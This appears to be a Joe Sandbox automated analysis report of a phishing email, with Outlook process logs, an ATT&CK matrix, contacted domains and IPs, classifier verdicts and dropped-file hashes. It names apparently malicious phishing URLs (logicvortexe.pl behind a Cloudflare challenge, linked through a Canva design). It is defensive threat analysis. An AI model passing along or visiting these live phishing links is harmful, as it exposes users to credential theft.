Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS Memory13
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection
1
DLL Side-Loading
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
about:blank0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
static.cloudflareinsights.com
104.16.80.73
truefalse
    unknown
    logicwavewe.ru
    188.114.96.3
    truefalse
      unknown
      p.tvpixel.com
      99.83.205.94
      truefalse
        unknown
        www.canva.com
        104.16.102.112
        truefalse
          unknown
          adservice.google.com
          142.250.185.66
          truefalse
            unknown
            spdc-global.pbp.gysm.yahoodns.net
            34.252.40.201
            truefalse
              unknown
              d1w725hft9421a.cloudfront.net
              3.161.119.88
              truefalse
                unknown
                ct.canva.com
                216.239.32.21
                truefalse
                  unknown
                  code.jquery.com
                  151.101.66.137
                  truefalse
                    unknown
                    static.canva.com
                    104.16.103.112
                    truefalse
                      unknown
                      media.canva.com
                      104.16.102.112
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.24.14
                        truefalse
                          unknown
                          font-public.canva.com
                          104.16.102.112
                          truefalse
                            unknown
                            www.google.com
                            142.250.185.196
                            truefalse
                              unknown
                              a.nel.cloudflare.com
                              35.190.80.1
                              truefalse
                                unknown
                                o13855.ingest.sentry.io
                                34.120.195.249
                                truefalse
                                  unknown
                                  urldefense.com
                                  52.71.28.102
                                  truefalse
                                    unknown
                                    ad.doubleclick.net
                                    142.250.185.230
                                    truefalse
                                      unknown
                                      chunk-composing.canva.com
                                      104.16.102.112
                                      truefalse
                                        unknown
                                        logicvortexe.pl
                                        172.67.140.75
                                        truefalse
                                          unknown
                                          telemetry.canva.com
                                          104.16.102.112
                                          truefalse
                                            unknown
                                            googleads.g.doubleclick.net
                                            172.217.18.2
                                            truefalse
                                              unknown
                                              challenges.cloudflare.com
                                              104.18.94.41
                                              truefalse
                                                unknown
                                                sb.scorecardresearch.com
                                                18.239.83.58
                                                truefalse
                                                  unknown
                                                  api.ipify.org
                                                  104.26.13.205
                                                  truefalse
                                                    unknown
                                                    sp.analytics.yahoo.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      urldefense.proofpoint.com
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        cdn.metadata.io
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          about:blankfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://logicvortexe.pl/YBBW6/true
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xkbon/0x4AAAAAAAhTwdWbdnGPyTzD/auto/fbE/normal/auto/true
                                                              unknown
                                                              https://www.canva.com/design/DAGOmfvTQik/JOV039GfGLa9-L3q9YZIrQ/view?utm_content=DAGOmfvTQik&utm_campaign=designshare&utm_medium=link&utm_source=editorfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.186.67
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.71.28.102
                                                                urldefense.comUnited States
                                                                14618AMAZON-AESUSfalse
                                                                142.250.74.200
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.100
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.111.231.25
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.16.80.73
                                                                static.cloudflareinsights.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.16.102.112
                                                                www.canva.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                216.239.36.21
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
                                                                15169GOOGLEUSfalse
                                                                172.217.16.142
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.66
                                                                adservice.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.26.12.205
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.186.36
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                74.125.133.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                74.125.71.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.110
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.18.95.41
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.217.18.2
                                                                googleads.g.doubleclick.netUnited States
                                                                15169GOOGLEUSfalse
                                                                18.66.102.115
                                                                unknownUnited States
                                                                3MIT-GATEWAYSUSfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                142.250.185.196
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.230
                                                                ad.doubleclick.netUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.25.14
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.186.130
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.18.94.41
                                                                challenges.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                216.58.206.38
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.182.141.63
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                3.161.119.88
                                                                d1w725hft9421a.cloudfront.netUnited States
                                                                16509AMAZON-02USfalse
                                                                142.250.181.232
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                99.83.205.94
                                                                p.tvpixel.comUnited States
                                                                16509AMAZON-02USfalse
                                                                104.16.79.73
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.26.13.205
                                                                api.ipify.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.74.195
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                52.113.194.132
                                                                unknownUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.110.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.24.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                3.255.41.64
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                216.239.32.21
                                                                ct.canva.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.16.103.112
                                                                static.canva.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.67.140.75
                                                                logicvortexe.plUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.185.130
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                34.252.40.201
                                                                spdc-global.pbp.gysm.yahoodns.netUnited States
                                                                16509AMAZON-02USfalse
                                                                18.239.83.98
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                188.114.96.3
                                                                logicwavewe.ruEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                184.28.90.27
                                                                unknownUnited States
                                                                16625AKAMAI-ASUSfalse
                                                                18.239.83.58
                                                                sb.scorecardresearch.comUnited States
                                                                16509AMAZON-02USfalse
                                                                34.120.195.249
                                                                o13855.ingest.sentry.ioUnited States
                                                                15169GOOGLEUSfalse
                                                                172.217.16.132
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                IP
                                                                192.168.2.17
                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                Analysis ID:1498073
                                                                Start date and time:2024-08-23 16:00:35 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:26
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                Analysis Mode:stream
                                                                Analysis stop reason:Timeout
                                                                Sample name:FW_ SLS properties Credit application.msg
                                                                Detection:MAL
                                                                Classification:mal48.phis.winMSG@31/108@102/290
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .msg
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, TextInputHost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.113.194.132
                                                                • Excluded domains from analysis (whitelisted): ecs.office.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: FW_ SLS properties Credit application.msg
                                                                InputOutput
                                                                URL: Email Model: jbxai
                                                                {
                                                                "brand":["SIAM"],
                                                                "contains_trigger_text":false,
                                                                "prominent_button_name":"REVIEW DOCUMENT",
                                                                "text_input_field_labels":["unknown"],
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "has_visible_qrcode":false}
                                                                URL: e-Mail Model: gpt-4o
                                                                ```json
                                                                {
                                                                  "riskscore": 8,
                                                                  "brand_impersonated": "Steam Solutions, SLS Properties",
                                                                  "reasons": "The email contains several indicators of phishing. Firstly, it impersonates two brands: Steam Solutions and SLS Properties. The sender's email address (cvazquez@steamsolutions.com) appears legitimate, but this can be easily spoofed. The subject line is not visible, but the body of the email contains a prominent 'REVIEW DOCUMENT' button, which is a common tactic to induce clicks. The email also includes a warning that it originated from outside the organization, which is a red flag. The presence of multiple email addresses and contact information at the bottom could be an attempt to appear legitimate. However, the overall structure and the urgent call to action suggest phishing."
                                                                }
                                                                URL: https://logicvortexe.pl/YBBW6/ Model: jbxai
                                                                {
                                                                "brand":["CLOUDFLARE"],
                                                                "contains_trigger_text":false,
                                                                "prominent_button_name":"unknown",
                                                                "text_input_field_labels":["unknown"],
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "has_visible_qrcode":false}
                                                                URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xkbon/0x4AAAAAAAhTwdWbdnGPyTzD/auto/fbE/normal/auto/ Model: jbxai
                                                                {
                                                                "brand":["CLOUDFLARE"],
                                                                "contains_trigger_text":false,
                                                                "prominent_button_name":"unknown",
                                                                "text_input_field_labels":["unknown"],
                                                                "pdf_icon_visible":false,
                                                                "has_visible_captcha":false,
                                                                "has_urgent_text":false,
                                                                "has_visible_qrcode":false}
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):231348
                                                                Entropy (8bit):4.393208906148746
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0DFA49BDC34FD1D8714D090254C16F2
                                                                SHA1:95BC18853EB00911C2F99AEB6DBF1ED16726AD8C
                                                                SHA-256:FFEDA7AFA486DB73D46C3A382C9B9D2FDACF10F5BD6F51D17537AFEA685B50C4
                                                                SHA-512:5A67D7C7768066F67B203A02D290E9F7C679BA5CB35439A926981CC15E5CCE721DE494482871ABF752AEA0193D820C55FEF9A403433C5156AED190A05C417EEF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:TH02...... .....d.......SM01X...,....J..d...........IPM.Activity...........h...............h............H..ht.x......s.D...h........x...H..h\tor ...AppD...h...0....x....h.u.-...........h........_`.k...h.t.-@...I.+w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. ha+.......x...#h....8.........$hx.......8....."h........`.....'h..............1h.u.-<.........0h....4.....k../h....h......kH..h..p...t.x...-h .........x...+h"j.-....h.x......... ...... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:XML 1.0 document, ASCII text, with very long lines (2167), with no line terminators
                                                                Category:modified
                                                                Size (bytes):2167
                                                                Entropy (8bit):5.11489207072026
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:351B43DEAF339F1AAC0784B21D758E23
                                                                SHA1:1268B60C4F9B38402ED377454FEFAA732231D4A7
                                                                SHA-256:11011D2F4DE3336444A06874675162BFAD5B38FB9D2E2A453CDC4C9B9A9ACD14
                                                                SHA-512:B944086817E31DADEC9A77CE6BDD6EAF9B71141E515092C8599DDF3EABAE791A3E73BA5FCBC4B348E8EC4107093B4DF70226CBFDE847B1009536BBF022D06257
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>14</Count><Resource><Id>Aptos_26215680</Id><LAT>2024-08-23T14:01:08Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2024-08-23T14:01:08Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-06T09:55:52Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-06T09:55:52Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-06T09:55:52Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T09:55:52Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:TrueType Font data, 19 tables, 1st "GPOS", 30 names, Macintosh, Copyright 2020 Microsoft Corporation. All Right Reserved.Amasis MT ProBlack1.000;MS ;AmasisMTPr
                                                                Category:dropped
                                                                Size (bytes):157496
                                                                Entropy (8bit):5.873883254547588
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EEAF543EB37D720685E5C2B1CED42CA1
                                                                SHA1:1CD542229D3CFCD022383D85EB8A8A9C93CC637D
                                                                SHA-256:0F026E9899C85018A489BE8FBE9AFB6475EC755CF08AEACE0CC989A0D961D70D
                                                                SHA-512:66F560B26BAA4C13B0CA3A13BEE53336B3100F8CC8B3D67AB5391AA30C27C761D46487F6E6F1EAE0532E8D54B4D06AB2F463EC831BE8DBE426541A9A4248D070
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........0GPOS...i...t..S.GSUB.-D...H8....OS/2^id........`VDMXm.v.........cmap..7U......D>cvt ......b.....fpgmc.....U.....gasp.;.&...d....glyf..&U..ip...xhead..=....<...6hhea. .....t...$hmtx..J.........kerntF. ..H.....loca.j(...d.....maxp...t....... meta2<s^..f....Lname%.{*.......{post...A........prepn.D..`|...<.........5L._.<..........\4L.....3.).2...*.........................@.2.A.*.................h.....i.V...^.........\...0.........R.........X...K...X...^.2.-................@. [........MS .@.............. .............. ...........)...)...b.N...).....(.0......./.b.J...-... .=. ...5.b.I.....b.M...;.R.).R.y.R.3.R.>.R.#.R.F.R.,.R.D.R.-.R.!.b.M.b.I...5...5...5... ...........(.......*...).q.*...0...*...&.3.$...(.g.'...)...)."./...'."./...*.\.9...........................+...I...;...(...=.....b.@.\.'.{.....(.{.%.3.&.w...<.......X...X.......X...........\.%.{...q.'.......,.........q...........q...R.(...6...........0.b.N...(.=.....A.....R...=.&...5...).q.@.q...m...m.!.....R.!...$.b.M...?
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:TrueType Font data, 16 tables, 1st "GDEF", 17 names, Microsoft, language 0x409, Copyright (c) 2015 by Laura Worthington. All rights reserved.Congenial BlackRegularLauraWorthing
                                                                Category:dropped
